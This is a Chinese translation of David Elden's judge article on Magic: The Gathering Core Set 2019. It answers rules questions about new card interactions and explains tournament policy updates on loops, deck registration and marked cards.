新系列规则与方针详解 — 2019核心系列 (by David Elden)

 

每当一个新系列发布,总会伴随着规则、方针和很多其他方面的变动。如果你想搞清楚这些让你头疼的事情,那么你算来对地方了。这篇文章可以将你需要的东西一网打尽。

 

新牌张

 

Q:你能突发衰败飞升尼可波拉斯吗?

A:不能。双面牌的总法术力费用基于其正面的法术力费用,即使它背面朝上也一样[CR 711.4b]。因此,飞升尼可波拉斯的总法术力费用为4,它不是突发衰败的合法目标。

小贴士:游戏只能看到牌背面的总法术力费用,而不能得到其他的特征,例如颜色或者法术力费用。这也是为什么飞升尼可波拉斯需要一个颜色标志——没有这个,它将是无色的!如果飞升尼可波拉斯上结附了一个精华渗漏,因为颜色标志令它是红色的,它将会获得“牺牲自己”这个异能。飞升尼可波拉斯并没有法术力费用,这个费用是无法被支付的,所以它的操控者将必须牺牲它。

小贴士:对于更多双面牌通常如何运作的信息,查阅回归机制综述的文章

 

Q:AP的仿生妖复制了NAP的烈龙尼可波拉斯,然后起动了它的4UBR异能,会发生什么?

A:仿生妖被放逐这部分运作正常,但是当游戏要将仿生妖转化并移回战场时就遇到问题了。因为仿生妖不是一个双面牌,将它转化并放进战场是一个不可能的动作,所以它就留在了放逐区内[CR 711.8a]。

 

Q:AP用霰散弹和它的19个复制品指定NAP为目标,AP操控一个庇佑护身符,他需要为霰散弹本身或所有的复制品各支付1吗?

A:霰散弹的每个复制品都是一个咒语[CR 706.10],每一个的目标都是NAP,因此,对于每一个复制品而言NAP“成为了目标”。AP需要为霰散弹本身和所有的复制品均支付1。

小贴士:即使AP以其它物件为霰散弹的目标(也许是NAP操控的一个生物)并令其复制品的目标为NAP,NAP依然被认为“成为霰散弹复制品的目标”。

 

Q:AP操控阿耶尼的群伴,并以两个具有系命的生物进攻。阿耶尼的群伴的异能会触发几次?

A:“每当你获得生命时”这个异能会在任一来源令你获得生命时触发[CR 118.9]。即使所有的伤害是同时造成的,两个具有系命的生物也被认为是两个不同的来源,所以阿耶尼的群伴的异能会触发两次。

 

Q:AP操控阿耶尼的群伴,并用一个具有践踏和系命的生物进行攻击。NAP用一个生物填璇,所以AP对阻挡生物造成了致命伤害并将剩余的伤害踏到了NAP 脸上。阿耶尼的群伴的异能会触发几次?

A:和上一条不同,即使受到伤害的是两个不同的对象,造成伤害的也只有一个来源。所有的战斗伤害同时造成,所以阿耶尼的群伴只看到AP获得了一次生命。

 

Q:月轮山影和以下牌张的互动如何?

A:你的对手操控的名为“克撒的塔”的地会失去所有的地类别和异能。所以它们将不能横置产3费,而仅能产一点任意色。且由于月轮山影剥夺了这些类别,你对手的克撒的矿脉克撒的动力炉也找不到类别为“克撒的”和“塔”的地。因此,这二者也都不能产2费。

A:如果月轮山影比维苏瓦早进入战场,将会使维苏瓦的“进入战场且为该地的复制”异能在生效前就失去[CR 614.12]。维苏瓦像一个没有任何其他异能的地一样进入战场,且能产一点任意色。如果维苏瓦先进入战场,它将会在复制过程中复制另一个地的名字[CR 706.2],所以月轮山影并不能影响它。

A:在层4中,乌尔博格令所有地具有沼泽类别,月轮山影令乌尔博格失去所有地类别。这两个效应之间并没有从属关系。乌尔博格的效应先生效不会改变月轮山影效应的对象,仅仅是改变了和月轮山影效应有关的物件。所以,它们之间应用时间印记。如果月轮山影比乌尔博格晚进入战场,乌尔博格不是一个沼泽,否则它是。其他的所有地都因乌尔博格的异能生效而具有沼泽类别。给予沼泽横置产B的异能是CR中的规则,并不是一个持续应效应,所以它们在这时生效,而并不需要等到相应的层才生效[CR 305.6]。在层6中,月轮山影令乌尔博格失去所有异能,这意味着它不再具有“横置:产B”的异能,尽管它仍是一块沼泽。此外,乌尔博格也因此失去了将所有地变成沼泽的异能,但这毫无意义,因为这条异能已经生效过了。在这一层中,月轮山影还给了乌尔博格一条横置产一点任意色的异能。

A:树灵乔木将会失去所有地类别,但其他牌类别和副类别会被保留[CR 205.1a]。所以树灵乔木是一个生物地-树灵。它失去横置产G的异能,但是获得了横置产一点任意色的异能。它依然是一个绿色生物,这是颜色标志所决定的,而不是由异能决定。它仍是一个生物,所以包括召唤失调在内的对生物生效的规则仍对它生效。

A:月轮山影只能让你选择一个“非基本地牌的名字”。因为覆雪海岛有超类别“基本”,它是一个基本地,所以你不能选择它的名字。

A:如果黑暗深渊在月轮山影之后进入战场,这使它“进入战场上面有十个寒冰指示物”的异能在生效前就失去了,它上面将什么都不会有[CR 614.12]。如果黑暗深渊先进入战场,它会获得这些指示物且它们仍在上面,尽管这些指示物将不再具有什么实际意义。不论哪种情况,黑暗深渊都将失去当其上没有寒冰指示物时将其牺牲的异能。因为月轮山影不影响超类别,黑暗深渊依然是一个“传奇雪境地”,它仍是一个传奇,所以传奇规则始终对它生效。此外,黑暗深渊始终是一个雪境永久物,雪境永久物产生的法术力可以用来支付{S}[CR 107.4h],所以黑暗深渊新异能产生的任意颜色法术力可以被用于…比如,启动若纳山口异能所需的雪境法术力。

 

Q:AP操控智龙阿卡迪并使用了猛扑,令他的新手骑士和NAP的山丘巨人互斗,会发生什么?

A:这可真是一个菜鸟级操作。互斗并不被认为是“战斗伤害”[CR 701.12d],所以阿卡迪的异能并不会影响将造成伤害的大小。

 

Q:AP用智龙阿卡迪迷雾墙进行攻击,NAP在造成伤害之前使用了一张杀消灭了阿卡迪,会发生什么?

A:即使现在没有能允许迷雾墙合法进攻的效应,但它已经被宣告为攻击生物,这仍是合法的。因此,迷雾墙仍是一个攻击生物并且能如常造成伤害[CR 506.4a]。不幸的是,由于阿卡迪已经不在战场上了,迷雾墙造成的伤害等同于它的力量,也就是说,它什么伤害都无法造成[CR 510.1a]。

 

Q:AP使用了X=5的禁咒焰,目标为NAP的灰棕熊。NAP响应施放了蔽目浓雾,会发生什么?

A:因为灰棕熊现在是辟邪的,它不再是禁咒焰的合法目标。由于所有目标都不合法,禁咒焰被从堆叠上移除,不会产生任何效应[608.2b]。这不是“反击”禁咒焰或“防止”伤害,因为描述这个过程的CR条文并不使用这其中的任何一个词,所以在这个回答里X的数值并没有作用。

小贴士:在过去,如果咒语没有合法的目标,在结算时会被规则反击。但现在,CR仅仅是说“从堆叠上移除”而不用“反击”这个词来描述了[608.2b]。这也是为什么原版的禁咒焰使用的是“不能被咒语或异能反击”,而现在的牌张只写着“不能被反击”。

 

Q:AP用殴斗食人魔进行攻击,NAP想要在AP牺牲生物之后,殴斗食人魔得+2/+2之前对它施放闪电击,这可能吗?

A:不能,牺牲生物这个效应是殴斗食人魔异能的一部分。像这样的异能,在结算时才做出决定(以及哪个生物将要被牺牲)[CR 117.12]。在AP牺牲生物和殴斗食人魔获得+2/+2之间没有牌手能获得优先权[CR 608.2f]。即使NAP能够以某种方法在这时施放闪电击,状态动作的检查也只会在异能结算之后进行,所以殴斗食人魔无论如何也不会死。

小贴士:在比赛中,正因为这个异能的运作方式会在游戏中造成一定的意图泄露,因此NAP是可以对这个异能做出回应的。除非他们真的想要使用它,否则大部分牌手不会宣告这个异能。NAP可以通过这个信号来获知AP打算牺牲某个生物的计划从而闪电击掉食人魔。为了避免这种情况,AP需要每回合都宣告这个触发,并且在NAP让这个异能结算之后表明他并不希望牺牲任何生物。

 

Q:AP通过混沌法杖翻出了寄托 // 记忆,他可以施放”记忆”吗?

A:寄托//记忆是一张瞬间或法术牌,所以AP可以施放它。在施放连体牌的过程中,有一个步骤让牌手选择施放的是连体牌的哪一边[CR 708.3]。余响意指“除了从坟墓场之外,不能从任何区域施放此连体牌的这半边”[CR 702.126a]。因为AP从放逐区施放它,他只能施放寄托这一边。

小贴士:相同的情景,AP需要遵守咒语的施放时机(突现叶网)、操控xx(卡恩的时间碎裂)、或者其它(抵销劣势)限制条件。混沌法杖允许你绕过CR中何时施放咒语的限制(比如你通常不能在异能结算过程中施放咒语),但是它不能让你绕过牌面上的限制或者其他适用的效应(赛费尔法师泰菲力不朽霸权史芬斯的裁决)[CR 101.1,101.2]。

 

Q:探测塔能让你绕过恶意骑士这样的反某色辟邪异能吗?

A:可以,一个使具有辟邪的生物能视同不具辟邪异能成为目标的效应同样也会作用于“反X辟邪”异能[CR 702.11e]。

 

Q:AP使用了全能渐散,NAP弃掉了包括顽强巴洛西在内的一部分手牌。当全能渐散要求NAP牺牲生物时,这张牌会在场上被计入NAP操控的生物总数里吗?

A:是的。顽强巴洛西有一个替代式效应,这意味着NAP将它弃掉的动作被替代为将其放进战场,并且这发生在原始事件发生的同一时间[CR 614.6]。全能渐散使用了三个动词,所以结算过程中产生了三个不同的动作[CR 608.2c],并按照牌面上的顺序执行[CR 608.2e]。这意味着当NAP需要牺牲他一半的生物时,顽强巴洛西会被计入其中。

小贴士:获得生命是顽强巴洛西的触发式异能,这意味着在全能渐散结算完毕之前,它不会发生。

小贴士:同样的,阿耶尼奋绝抗击派出一个天使衍生物是一个触发式异能,所以当你因对手的全能渐散弃掉它时,这个衍生物在计算需牺牲的生物数量时不会被计入其中。

 

Q:AP在双头巨人游戏中施放了全能渐散,会发生什么?

A:发生了很多事情,但是后果最严重的一点是每位牌手失去一半生命。在双头巨人游戏中,当需要得到一位牌手的总生命时,应用他队伍的总生命[CR 810.9a]。当每位牌手失去队伍总生命的一半,且小数点后进位的时候,每个队伍的生命最终会是0或-1。在下一次检查状态动作时,双方队伍的生命都为0或更少,所以他们都将输掉游戏[CR 704.5t]。因为所有队伍同时输掉,所以游戏将是平局[CR 104.4d]。

小贴士:双头巨人比赛要求先赢得一盘游戏,而不是只看“一盘的胜负”,所以只要这一轮还有时间,两个队伍就要进行新一盘游戏[MTR 9.1]。由上一盘平局游戏中决定先后手的队伍来选择新游戏的先手后[MTR 2.2]。

 

Q:AP操控一个横置的黑山之威血爪和4张未横置的山脉,他可以施放马拉克瑟斯吗?

A:可以。在施放咒语的过程中,第一件事是确定咒语的费用。马拉克瑟斯有一个特征定义异能,在任何区域都生效,包括在堆叠上[CR 112.6a]。当确定血爪的异能能否对马拉克瑟斯生效的时候,将会看到AP操控四个未横置的地,所以马拉克瑟斯是4/4的。因为血爪的异能对其生效,马拉克瑟斯的费用被设定为2RR。在此之后,AP有一个时机去启动法术力异能。横置所有山脉会使马拉克瑟斯变成0/0,但是马拉克瑟斯的费用此时已经确定,游戏不会在这之后重新计算总费用[CR 601.2f]。

小贴士:马拉克瑟斯的异能会将自己计算在内,因此当它进场后防御力不会成为0,也就不会因此立刻死去了。

 

Q:AP操控萨坎解印,他横置6个山脉来施放马拉克瑟斯。他不操控任何其他永久物,会发生什么?

A:一个咒语直到所有的施放步骤完成后才被认为完成“施放”,这些步骤包括支付其费用[CR 601.2i]。这意味着在游戏中将要去判断马拉克瑟斯是否会触发萨坎解印时,AP所有的山脉都是横置的。马拉克瑟斯的特征定义异能在任何区域生效并不断地更新它的力量,当游戏检查萨坎解印是否会触发时,马拉克瑟斯的力量是0,所以无事发生。

 

Q:AP在操控萨坎解印的时候,施放X=7的饥渴多头龙,会触发萨坎解印的异能吗?

A:不会,饥渴多头龙只有在它结算并进入战场时才获得指示物。因为饥渴多头龙在施放时并没有+1/+1指示物,萨坎解印只能看到一个力量为0的生物咒语。

 

Q:AP对NAP的觅识械施放狱境报复,作为响应,NAP施放了一个咒语使觅识械得-6/-0,会发生什么?

A:觅识械被放逐并且AP得到-4生命。由于无法获得负数生命[CR 107.1b],所以这部分就不会发生。AP维持原有的生命值。

 

Q:NAP有一个结附着炼狱留痕灰棕熊。AP施放预示时刻。NAP抓牌吗?

A:预示时刻同时消灭灰棕熊和炼狱留痕。而炼狱留痕的触发式异能是一个“离开战场”触发,这意味着触发取决于异能触发前时点的游戏状态。在那个时点,灰棕熊是具有“抓一张牌”的异能的,所以NAP会抓一张牌。

小贴士:炼狱留痕的模式指示该生物的操控者抓一张牌,而不是炼狱留痕的操控者。

 

Q:AP和NAP都操控执政官的权杖。在AP的主回合,AP起动他的执政官权杖的异能获得一个额外回合,NAP响应这个异能做了相同的事。会发生什么?

A:最后被创造出来的额外回合将会最先进行[CR 500.7]。AP的额外回合在NAP之后被创造,所以AP会进行下一个回合。在这之后,NAP会进行他的额外回合。在此之后,游戏会回到创造这些额外回合之前应该进行回合的人手里,所以,应该是NAP。

小贴士:如果NAP等AP的权杖异能结算完才起动异能,那么下个回合将由NAP进行,然后接下来的回合将由AP进行。在此之后,将由NAP来进行他的正常回合。

 

Q:AP使用拟形变幻使他的灰棕熊变成谷玛,会发生什么?

A:一旦拟形变幻进入战场,灰棕熊会变成谷玛的复制品并且具有反蓝保护,状态动作会使拟形变幻进入AP的坟场,这时灰棕熊就会恢复成原来的自己。

 

Q:AP使用拟形变幻使他的灰棕熊变成NAP的底密尔化妖。之后NAP起动底密尔化妖的异能,放逐一个山丘巨人。现在灰棕熊会变成什么样?

A:如果一个静止式异能产生了一个是复制效应的持续性效应,该效应赋予的可复制特征值仅在该效应第一次开始生效时决定[CR 706.2c]。所以灰棕熊就是一个普通的底密尔化妖,而不是山丘巨人。

 

Q:AP操控全知全能,然后免费施放无上力量,作为响应,他的对手对全知全能施放消除魔障。会发生什么?

A:因为AP是从手上施放无上力量,所以他会得到10点法术力。无上力量没有指出这些法术力只能用来施放它放逐的那些咒语,所以AP可以随便用这些法术力做他想做的。

小贴士:NAP不能在AP施放一个咒语前施放消除魔障,因为AP作为主动牌手会在全知全能结算完第一个获得优先权[CR 116.3b]。

小贴士:全知全能只对从你手上施放的牌生效,由于通过无上力量“抓起来”的牌是从放逐区施放,所以即使你有全知全能,你也不能免费使用它们。

 

Q:AP起动死灵术士莉莲娜的-7异能,并将避邪符巫妖觅识械移回场上。AP没有操控其他神器,会发生什么?

A:避邪符巫妖的异能使你于其进场时在一个神器上放置一个指示物。这是一个替代式效应。因此这个异能会在巫妖进场前立即生效[CR 614.12a]。因为觅识械是和避邪符巫妖同时进场的,他那时候也没在场。所以AP不能在任何东西上放指示物,并且避邪符巫妖的牺牲异能会立即触发。

 

Q:AP操控两个避邪符巫妖和两个觅识械。每个巫妖各在一个觅识械上放了一个指示物。如果一个觅识械被消灭,会发生什么?

A:什么都不会发生。避邪符巫妖的异能只有在你不操控任何上面有避邪符指示物的永久物的时候触发。因为AP仍然操控一个有避邪符指示物的永久物,所以两个巫妖都是安全的。如果第二个觅识械也被消灭了,他就需要把两个巫妖都牺牲。

 

Q:AP对伊莫库残肢施放坟场复生。NAP可以用狱境报复放逐它吗?

A:不行。虚色和坟场复生的“成为黑色”部分效应都在层5生效。因为虚色是一个特征定义异能,它会先生效[CR 613.2]。所以伊莫库残肢先成为无色,然后额外具有黑色。因为“无色”表示某物没有颜色[CR 105.2c],由于伊莫库残肢现在至少具有一种颜色,他不再是一个无色永久物,因此,它不是狱境报复的合法目标

小贴士:因为相同的原因,任何被坟场复生的神器生物也不能被狱境报复指定目标。

 

Q:循环一个漫灌农地会触发符脊悍扫龙的异能吗?

A:不会。一个异能描述“地”,并没有使用其他描述词,那表示是在战场上的地 [CR 109.2]。因为漫灌农地是从手上循环的,游戏认为这是起动“地牌”的异能,并且异能如果关注此类事件(“地牌”),则会在描述中提及相应的说法。

 

Q:我能使用炎血萨坎产生的法术力来施放灵龙乌金吗?

A:不行。这些法术力只能用来施放“龙咒语”。一个“龙咒语”是一个具有“龙”副类别的咒语 [CR 109.2b]。乌金不具有这个副类别,所以它不是一个龙咒语。尽管你可能在它的名字,插画,或者各种其他牌的背景叙述中看到它是个“龙”。

 

Q:AP起动墨蛾连结点,并使用卓越赋生师使墨蛾连结点变成5/5。现在墨蛾连结点是什么?下回合它又是什么?

A:墨蛾连结点在本回合是一个5/5具有飞行和侵染异能的神器生物地。之后,墨蛾连结点使自己变成神器生物的异能效应会消失。但卓越赋生师并不关心这个。墨蛾连结点在赋生师异能发生的时候是合法目标,所以只要卓越赋生师在场,它的效应就会对墨蛾连结点持续生效。即使那个效应并没有使用“额外具有类别”,但出于某种原因,一些效应令物件成为一个“神器生物”时,此效应即便不提及“额外具有类别”仍会保留该物件上所有原有的牌类别,因此墨蛾连结点仍然是一个地[CR 205.1b]。

小贴士:再次起动墨蛾连结点的异能会给它飞行和侵染,但是这也会因为时间印记给它设定一个新的攻防。在这种情况下,墨蛾连结点会成为具有飞行侵染异能的1/1神器生物地。

 

Q:AP施放啸电巨龙,他能不支付2R就杀掉NAP的灵异水手吗?

A:不行。与之前有类似异能的牌张所不同的是,灵异水手仅当其成为咒语的目标时才会被牺牲。这个新变化是自阿芒凯系列的迷宫守护者开始的,并且在易夏兰系列中流离谋士杰斯的-2异能中再次出现。请记得RTFC(仔细阅读牌面)以确保相应的异能确实是按你想象的方式运作的。

 

Q:AP施放啸电巨龙,他能不支付2R就杀掉NAP的渡霜怪吗?

A:答案仍然是不能。但这次,则是因为啸电巨龙的异能描述所导致的。啸电巨龙的异能分成两个触发:一是在当它进入战场时发生,该触发不指定任何目标;另一个则在其操控者支付2R后触发,并以渡霜怪为目标。因为直到AP支付2R之前都不会触发这个以渡霜怪为目标的异能,所以除非AP支付2R,否则渡霜怪便不会被牺牲。

小贴士:一些类似的异能(电流权能)使伤害发生在“若你如此做时”而不是“当…时”,这种异能会在不支付费用的情况下杀掉渡霜怪。将这种异能转化为自身触发式异能的新变化始于阿芒凯的穿心蝎狮

小贴士:这种描述上的新变化似乎只会影响带有目标的异能。例如,吐焰依然沿用老的描述,使用“若”你支付费用而不是“当”你支付费用时来运作回手异能。

 

Q:AP使用承阳净化僧的异能指定NAP的虔诚德鲁伊。NAP还操控一个缓伤维齐尔。NAP还能产出无限法术力吗?

A:虔诚德鲁伊和缓伤维齐尔的组合技是因为维齐尔的替代式效应修改了起动虔诚德鲁伊重置异能的费用。新的动作被修改为[在虔诚德鲁伊上放置0个-1/-1指示物],所以你可以任意起动你想要的次数。但只要承阳净化僧在场上,想要在虔诚德鲁伊上放置指示物是不合法的[CR 614.17b]。游戏并不会发现缓伤维齐尔的替代式效应将要改变支付的费用,因为这要在之后实际支付费用的步骤中才会发生,而承阳净化僧在确定费用的步骤就已经介入干预了。

 

Q:AP使用了私密交换,NAP响应给了其中一个生物辟邪,接下来会发生什么?

A:因为还有至少一个目标是合法的,私密交换将会尽可能结算[CR 608.2b]。但这并不会有什么用处。不合法的那个目标不会被私密交换的效应所影响,所以它的操控权不会发生改变[同上]。因为交换的一部分不能发生,所以整个交换都不会发生[CR 701.10a]。

小贴士:假设NAP对AP的生物施放了倒戈相向而不是一个辟邪咒语。由于私密交换并未要求目标被特定的牌手操控,所以它的目标都依然合法。另一方面,如果游戏试图交换两个永久物的操控权,而它们的操控者是同一牌手,什么都不会发生[CR 701.10b]。NAP不会永久操控AP的生物,AP也不会获得其中任一个生物的操控权。

 

Q:AP对NAP的灰棕熊起动了突变法杖的异能。作为回应,NAP施放了一个咒语使灰棕熊获得了不灭,接下来会发生什么?

A:突变法杖创造2/4牛衍生物的异能不取决于是否消灭该生物,使用的描述与“若你如此做”或者“当它在本回合死去时”不同。所以这个异能将会尽可能的结算,不灭的生物不会被消灭,但会派出牛衍生物。

小贴士:如果NAP的咒语给予的是辟邪而不是不灭。突变法杖的异能在结算时没有合法的目标,将不会产生任何效应并从堆叠上被移除。NAP的生物依然安全,但他不能额外赚到一头牛了。

 

Q:AP使用重获自由的卡恩的异能,带着怖龙瓦威提阿玛迪重新开始了游戏。当他用怖龙攻击时,场上没有其他永久物,接下来会发生什么?

A:因为NAP没有永久物,要AP选择目标由NAP操控的永久物是不可能的。因为不可能对异能要求的每个目标进行合法选择,这个异能将从堆叠上移除,什么都不会发生[CR 603.3d]。

 

Q:我能在对手不操控生物的情况下施放薇薇安召现吗?

A:可以。一个瞬间或法术咒语只有在它的咒语异能使用“目标”一词时才被认为该咒语具有目标[CR 114.1a]。“当以此法将生物放进战场时”这个异能不是薇薇安召现咒语异能的一部分,而是一个独立的触发式异能,仅在该咒语结算过程中触发[CR 112.3a,603.12]。这意味着薇薇安召现并不具有目标,只是它的触发式异能才具有目标。因此,即使没有任何生物能指定为目标,施放薇薇安召现也是合法的。同理,你也可以在场上没有神器的情况下施放疯狂莽夫

小贴士:就像疯狂莽夫一样,薇薇安召现的触发式异能不是可选的。如果你的对手操控一个生物,只要你将生物放进场,就必须对它造成伤害。


规则与方针变动

 

Q:NAP使用依夏兰的束缚,放逐了AP的不死斯奎。AP可以施放这个斯奎吗?

A:不行。有意思的是,在上一版规则中,这其实是可以实现的。首先,AP可以试图施放斯奎,第一步是将该咒语置于堆叠上,接着,当游戏检查施放斯奎是否合法时,会发现它已经不再被依夏兰的束缚所放逐了。不过规则部门貌似不喜欢这个互动,因此他们决定要治一治斯奎。所以在最新的规则中,只有当在施放过程中需要通过选择来改变一些特性时,你才可以在原本这些特性会导致无法施放的前提下来施放咒语。由于在施放不死斯奎的过程中不会改变它的牌名,因此便不能试图合法施放它。

小贴士:可以通过在施放过程中改变咒语的特性,从而使得原本因为该特性无法施放的咒语变得可行,这条规则的存在确实有其用武之地。举例来说,规则部门希望你在操控钢铁魔像的情况下仍然能够施放神授咒语,或者通过施放一个X=9的旋雷来干掉对手操控的虚空筛除体

 

Q:AP启动炎血萨坎的-7异能。NAP回应施放狡智扒手。当衍生物进场后,AP施放铭印。请问会发生什么?

A:衍生物的拥有者为派出它们的牌手[CR 110.5]。狡智扒手和收集样本所产生的这类效应只会改变这些衍生物的操控者,但不会改变由谁派出它们。因此,AP仍然是这些衍生物的拥有者。

小贴士:上文所援引的规则正是在这次更新中所作出的修改。在之前的规则中,衍生物拥有者的定义,正是在其操控下将它们放进战场的那个人。

 

Q:本系列的轮抽比赛如何运作?牌手是否需要将其补充包中开出的基本地牌移除?

A:在M19系列中,补充包中的基本地位可能会被一张列表牌或是横进战场的非基本地(如蜿蜒河流)所替代。为了让每位牌手在轮抽期间都能获得相同数量的牌张,在轮抽过程中,该位置开出的牌张将被保留[MTR 7.7]。

小贴士:这意味着有很多最后一抓将是一张列表牌,而在一个限制赛环境中,这些牌将毫无用处。一定要提醒新牌手们,除非他们确实扣下了烈龙尼可波拉斯这张牌,才能在套牌中使用它,光有一张列表牌并没有用。

小贴士:此前据闻在千叶GP上补充包中的基本地和列表牌将被移除,而牌手仅会保留横置地进行轮抽,但实际情况可能会依方针变动发生变化。提请各位裁判注意的是,在使用M19系列产品的限制赛GP中执法时,建议向你的组长咨询轮抽流程的信息,以确保无误。

 

Q:我可以在标准构筑赛中使用九尾白狐这张牌吗?

A:如果你不知道这张牌的话,它来自于一个叫做幻境奇谭的对决系列,是专门针对中国的万智牌手发售的。这个系列基本上就是一个常见的对决系列,除了画作、背景叙述及角色设计等都充满了中国元素以外,它和旅法对决新手包这样的系列并没有什么区别。这个对决包在全球范围都有销售(至少从我调查的情况来看,来自欧洲、亚洲及南非等地区的裁判均表示可以在当地购买到这个对决包)。这个系列中的牌张可以在标准构筑赛事中使用,但是仅限于在中国地区[MTR 6.3]。它们在薪传和古典赛制中是合法的,但是不能在近代赛中使用。

 

Q:AP的牌库中已经没有牌了,但是她手里有一个龙命连结点。他是否可以通过反复执行施放龙命连接点并让过回合的动作来避免自己输掉比赛?

A:不行。以上文所述方式反复在每回合施放龙命连接点的做法,包含了一组不断反复的动作,即导致了一个“循环” [CR 720.1b]。AP可以根据其意愿执行任意指定次数的循环,但根据执行简化的规则,会实现一个明确的结果。如果通过实际操作来反复执行该循环,会导致游戏行动过慢的判罚[IPG 3.3]。在执行完有限次数的循环后,AP 需要作出一个与当前所不同的游戏决定,并很有可能因此导致他因为抓空牌库而输掉比赛。

小贴士:这个问题在MTR更新之前也不会有不同的答案。事实上,我是在MTR更新之前就编写了这个问题的!然而,MTR中有关于循环的这个新章节的出现,使我们有了方针上的支持,来评估解决其他类似问题(以及接下来的两个问题)。

 

Q:AP操控蛋白玛珂大学院废墟以及陷阱桥,而NAP则操控祀炼基定以及它的徽记。AP没有任何干掉基定的手段,而NAP也拿陷阱桥没办法,并且也没法阻止AP每回合反复用大学院废墟将另一个蛋白玛珂放回牌库顶,施放之并通过传奇规则将之置入坟墓场的操作。会发生什么?

A:本题所述的情况,也是一种“循环”,但其流程会跨越数个回合。但由于仅有一名牌手参与到维持该循环的执行中,因此本问题的答案与前一问题完全一样。我们将询问AP希望执行该循环的次数,之后他需要作出一个与之前不同的游戏决定,以将游戏状态导向一个不同的结果[MTR 4.4]。

 

Q:NAP操控全知全能。在AP的结束步骤中,NAP施放直觉,并找到了万世创伤伊莫库黠智祈愿以及另一个直觉。AP选择给NAP留了直觉。在结算伊莫库的触发之后,NAP再次施放直觉并找了同样的三张牌。此时AP呼叫了裁判,你会怎么处理?

A:这是一个在一回合内执行动作涉及双方牌手的循环。对于这种类型的循环而言,需要由AP先宣布一个执行次数,之后由NAP宣布他执行动作的次数。然后当游戏进行到完成两者中较小次数的动作时,宣布该次数的牌手将获得优先权。如果该牌手是AP,则他可能会让过优先权,之后NAP将不得再次施放直觉,因为这样做将会导致刚刚结束的循环重新被执行。而假如该牌手是NAP,则出于相同的原因,他也不得再次施放直觉。

 

Q:当你(作为裁判)在旁观一场GP赛事的比赛时,看到AP用博默区讯使攻击,但忘记了放逐自己的牌库顶牌。你会如何处理?

A:除非认为因牌手遗漏了通常认为对其操控者不利的触发式异能应给予警告,否则裁判在观察到牌手遗漏触发时不应干预比赛。虽然“放逐你的牌库顶牌”这条异能单独来看确实是对其操控者不利的,但博默区讯使的另外一条异能则很明显地将这个放逐变成了正面异能。在判断异能性质时,不应考虑当前的游戏状态,但需将牌张上的其他异能纳入考量。在本案例中,博默区讯使的触发不属于通常对其操控者不利的异能,因此除非该比赛中的牌手就此情况呼叫裁判,否则我们不应当进行干预。

小贴士:与本题相关的规则与方针均未发生变化,但是Toby Elliot在方针更新的文章中指出,裁判计划的高层发现在此类判罚中常会出现一些令人困扰的情况。因此我特意编写这个问题以作为提醒,并且我建议各位阅读一下Toby的文章,以进一步了解判断此类触发是否对其操控者不利的背后原则。

 

Q:AP在宣告攻击者时,发现本回合他有一个生物忘记重置了。他已经为本回合抓了牌并且场上还有一个找地地。你会如何处理?

A:在你该重置生物的时候未能重置,是一个违反游戏规则的违规。根据此前的方针,面对这种情况,我们只有两种不那么理想的处理方式:要么将游戏保持现状从而保留该生物的横置状态,或者将游戏倒回从而给予AP一个可以将一张手牌洗走的机会。在最新的方针更新中,“牌手在回合开始时,忘记将其操控的一个或数个永久物重置,且当前仍为该回合”这样的情况,也被加入到了可执行部分修正的情形之中,因此现在我们只需要将该生物重置以作修正即可。

 

Q:在一场薪传比赛对局的第三盘中,AP在一回合施放了丧仪祭师。NAP呼叫裁判并指出丧仪祭师现在在薪传赛制中是禁牌。AP 刚接触这个赛制不久,因此他的套牌是从以前赛事的牌表中抄来的,他并不知道丧仪祭师现在是一张禁牌。在AP的牌表中,丧仪祭师列在主牌当中。你会如何处理?

A:由于将一张禁牌包含在自己的牌表中,AP犯下了套牌登记表问题的违规,并将受到一盘负的处罚。在此前的方针中,只有当套牌检查过程中发现的套牌登记表问题才会立即收到处罚;在其余情况下,例如本题中所发生的违规,需要等到下一轮比赛开始时才进行处罚。如今,所有在比赛流程中发现的套牌登记表问题,都将立即执行判罚,因此AP会在本轮比赛的第三盘中受到一盘负的处罚。

小贴士:在比赛流程本身之外发现的套牌登记表问题,仍将在下一轮比赛开始前才予以判,除非当值裁判认为该问题很显然意味着套牌本身也是非法的。举例来说,假如有裁判在整理牌表时发现AP的套牌登记表上列有丧仪祭师,这很显然意味着AP 的套牌本身也是非法的,因此在这种情况下,正确的做法应当是立刻找到AP,在离开当前座位后向其确认是否在套牌中使用了丧仪祭师,并对其作出一盘负的处罚。而另一种情况下,假如有裁判在整理牌表时发现AP在其套牌登记表上列有16张备牌,那仍有可能意味着其本身的套牌是合法的,在这种情况下,该违规需要延迟到下一轮比赛开始时再进行处罚。

 

Q:AP在一回合掰了一块找地地,然后在搜寻牌库的过程中呼叫了裁判。在离开当前座位后,他向裁判解释自己的主牌中有一张点破咒语且备牌中也有一张,他在上一轮比赛中将备牌中的点破咒语换到了主牌中,但在刚才搜寻牌库时,他发现自己本轮比赛开始前忘记将该备牌还原了。你会如何处理?

A:由于AP使用套牌未能与他的套牌登记表保持一致,因此这是一个套牌问题的违规。该违规的默认触发是警告,但如果失误导致原本即在主牌中使用之某牌数量较原有登记为多,且是在游戏开始之后才发现此失误,则会升级为一盘负。对于本题中所描述的情况而言,本次更新列入了一类额外情况从而逃脱了升级处罚的范围。即如果所有相关牌张在问题被发现时仍处于牌库的随机部分当中,则只需修正该错误并继续进行比赛。因此本题中的情况,判罚不会升级,处罚仍为警告。

 

Q:AP在当轮比赛开始时呼叫裁判,并指出他对手套牌中的部分牌张有点拱起。在离开时当前座位后,你向NAP确认了他的套牌中确实包含有几张闪卡,且它们有明显的弯曲。五分钟后,他从赛场摊贩区回来,说他为其中部分牌张找到了替换品,但是所有店家都没有地下指命出售。你会如何处理?

A:NAP所使用的部分牌张是有记号的,因此必须将其更换。若他无法找到相应的替换品,则这些有记号的牌将从他的套牌中被移除,且NAP可以为每一张被移除的牌,挑选一张树林、海岛、山脉、平原或是沼泽加入到套牌中。根据最新方针文件中的明确规定,由于该修正将改动NAP的套牌登记表,因此他将收到一盘负的处罚。

小贴士:该问题所对应的违规应为有记号的牌,而非套牌问题或套牌登记表问题。

小贴士:如果在接下来的比赛中NAP能为其原本有记号的牌张寻找到无记号的版本,则他可以将套牌登记表回复原状,且不会因此改动而进一步收到处罚。


原文:M19 New Set Digest

作者:David Elden (发布于2018年7月20日)

翻译:吴振宇、王人可、李思扬

